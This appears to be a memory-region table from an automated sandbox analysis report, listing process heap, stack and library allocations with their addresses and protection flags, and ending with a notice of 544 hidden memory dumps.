7FFAAC4E1000
trusted library allocation
page read and write
25F0E9B0000
heap
page execute and read and write
7FFAAC426000
trusted library allocation
page read and write
7FFAAC456000
trusted library allocation
page execute and read and write
17AE3A6A000
heap
page read and write
17AE645A000
heap
page read and write
17AE3A69000
heap
page read and write
2262E0A0000
heap
page read and write
17AE386D000
heap
page read and write
25F102A4000
heap
page read and write
22613F40000
heap
page read and write
25F28F12000
heap
page read and write
25F28800000
heap
page execute and read and write
7FFAAC373000
trusted library allocation
page execute and read and write
7DF4C3640000
trusted library allocation
page execute and read and write
11C8000
heap
page read and write
267737F0000
heap
page read and write
A4C81FE000
stack
page read and write
7FFAAC550000
trusted library allocation
page execute and read and write
7FFAAC38B000
trusted library allocation
page read and write
7FFAAC5D0000
trusted library allocation
page read and write
26C49143000
heap
page read and write
267739C0000
heap
page read and write
7FFAAC560000
trusted library allocation
page read and write
8A50B3E000
stack
page read and write
22614038000
heap
page read and write
25F11A0E000
trusted library allocation
page read and write
CD06DA3000
stack
page read and write
7FFAAC630000
trusted library allocation
page read and write
26C2F228000
heap
page read and write
25F10280000
heap
page execute and read and write
26C49130000
heap
page read and write
7FFB1E3C0000
unkown
page read and write
26C2F130000
heap
page read and write
11CD000
heap
page read and write
DB0000
heap
page read and write
22615B68000
trusted library allocation
page read and write
26C31020000
heap
page execute and read and write
17AE386D000
heap
page read and write
26C2F1A7000
heap
page read and write
17AE384D000
heap
page read and write
7FFAAC590000
trusted library allocation
page read and write
26C3129E000
trusted library allocation
page read and write
8A50BBC000
stack
page read and write
7FFAAC430000
trusted library allocation
page execute and read and write
CD0737F000
stack
page read and write
26C2F170000
heap
page read and write
393F000
stack
page read and write
26C31C9E000
trusted library allocation
page read and write
25F1091C000
trusted library allocation
page read and write
2262DF93000
heap
page read and write
CD077FC000
stack
page read and write
26C328D3000
trusted library allocation
page read and write
25F102A0000
heap
page read and write
26C49310000
heap
page execute and read and write
26C41225000
trusted library allocation
page read and write
26C49200000
heap
page read and write
7FFAAC38B000
trusted library allocation
page execute and read and write
17AE3898000
heap
page read and write
11B7000
heap
page read and write
7FFAAC530000
trusted library allocation
page execute and read and write
25F101C2000
trusted library allocation
page read and write
3BBB000
stack
page read and write
7FFAAC690000
trusted library allocation
page read and write
7FFAAC640000
trusted library allocation
page read and write
25F28E40000
heap
page read and write
226159A0000
heap
page execute and read and write
CD081CE000
stack
page read and write
25F102B5000
heap
page read and write
7FFB1E3C2000
unkown
page readonly
25F1205B000
trusted library allocation
page read and write
25F20665000
trusted library allocation
page read and write
25F28C50000
heap
page read and write
10FC000
stack
page read and write
25F0E6E9000
heap
page read and write
8A5057F000
stack
page read and write
26C41071000
trusted library allocation
page read and write
7FFAAC6E0000
trusted library allocation
page read and write
22615A4A000
heap
page read and write
17AE56F2000
heap
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
26C30A90000
heap
page readonly
D96FFFF000
stack
page read and write
7FFAAC363000
trusted library allocation
page execute and read and write
17AE5DAE000
heap
page read and write
A4C7B53000
stack
page read and write
7FFAAC660000
trusted library allocation
page read and write
1B92B610000
heap
page read and write
335F000
stack
page read and write
7FFAAC3BC000
trusted library allocation
page execute and read and write
7FFAAC650000
trusted library allocation
page read and write
22613F54000
heap
page read and write
26C2F110000
heap
page read and write
A4C817E000
stack
page read and write
22613F8A000
heap
page read and write
7FFAAC520000
trusted library allocation
page execute and read and write
4FC27FE000
stack
page read and write
25F0E6D0000
heap
page read and write
26773AC4000
heap
page read and write
2D70000
heap
page read and write
22614135000
heap
page read and write
17AE3855000
heap
page read and write
7FFAAC420000
trusted library allocation
page read and write
26C2F43E000
heap
page read and write
7FFAAC364000
trusted library allocation
page read and write
26C2F1EE000
heap
page read and write
7FFAAC5C0000
trusted library allocation
page read and write
25F28830000
heap
page read and write
25F28ED0000
heap
page read and write
26C2F1BF000
heap
page read and write
7FFB1E100000
unkown
page read and write
7FFAAC502000
trusted library allocation
page read and write
7FFAAC580000
trusted library allocation
page read and write
7FFAAC650000
trusted library allocation
page read and write
1390000
heap
page read and write
25F103D9000
heap
page read and write
25F11DC1000
trusted library allocation
page read and write
7FFB1E3C5000
unkown
page readonly
7FFAAC600000
trusted library allocation
page read and write
25F10A92000
trusted library allocation
page read and write
A4C7F7E000
stack
page read and write
7FFAAC610000
trusted library allocation
page read and write
17AE3850000
heap
page read and write
26773810000
heap
page read and write
7FFAAC570000
trusted library allocation
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
CD074F9000
stack
page read and write
17AE56F0000
heap
page read and write
22625ABF000
trusted library allocation
page read and write
3200000
heap
page read and write
17AE3856000
heap
page read and write
25F10190000
trusted library allocation
page read and write
1380000
heap
page read and write
3E6E000
stack
page read and write
22615A40000
heap
page read and write
8A5168D000
stack
page read and write
22615F40000
trusted library allocation
page read and write
25F203E1000
trusted library allocation
page read and write
7FFB1E105000
unkown
page readonly
25F10AFE000
trusted library allocation
page read and write
25F0E8B0000
heap
page read and write
22615F32000
trusted library allocation
page read and write
26C328FE000
trusted library allocation
page read and write
7FFAAC446000
trusted library allocation
page execute and read and write
17AE3856000
heap
page read and write
7FFAAC5B0000
trusted library allocation
page read and write
26C49360000
heap
page read and write
7FFAAC5E0000
trusted library allocation
page read and write
22613FA2000
heap
page read and write
There are 544 hidden memdumps, click here to show them.